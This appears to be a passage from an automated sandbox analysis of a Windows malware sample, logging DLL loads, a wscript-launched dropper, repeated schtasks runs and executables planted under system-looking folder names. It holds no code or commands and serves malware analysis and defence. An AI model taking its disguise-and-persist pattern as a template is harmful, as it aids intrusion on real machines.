            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: version.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: wldp.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: profapi.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: amsi.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: userenv.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: propsys.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: edputil.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: netutils.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: slc.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: sppc.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: mscoree.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: apphelp.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: kernel.appcore.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: version.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: uxtheme.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: windows.storage.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: wldp.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: profapi.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: cryptsp.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: rsaenh.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: cryptbase.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: mscoree.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: kernel.appcore.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: version.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: uxtheme.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: windows.storage.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: wldp.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: profapi.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: cryptsp.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: rsaenh.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: cryptbase.dll
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeDirectory created: C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exeJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeDirectory created: C:\Program Files\Windows Portable Devices\db8cdfc8abc352Jump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeDirectory created: C:\Program Files\Windows Portable Devices\Idle.exeJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeDirectory created: C:\Program Files\Windows Portable Devices\6ccacd8608530fJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeDirectory created: C:\Program Files\Windows Portable Devices\upfc.exeJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeDirectory created: C:\Program Files\Windows Portable Devices\ea1d8f6d871115Jump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeDirectory created: C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exeJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeDirectory created: C:\Program Files\Windows Mail\db8cdfc8abc352Jump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeDirectory created: C:\Program Files\MSBuild\OjTEkrTlLyhdt.exeJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeDirectory created: C:\Program Files\MSBuild\db8cdfc8abc352Jump to behavior
            Source: rWjaZEKha8.exeStatic file information: File size 1661068 > 1048576
            Source: rWjaZEKha8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: rWjaZEKha8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: rWjaZEKha8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: rWjaZEKha8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: rWjaZEKha8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: rWjaZEKha8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: rWjaZEKha8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
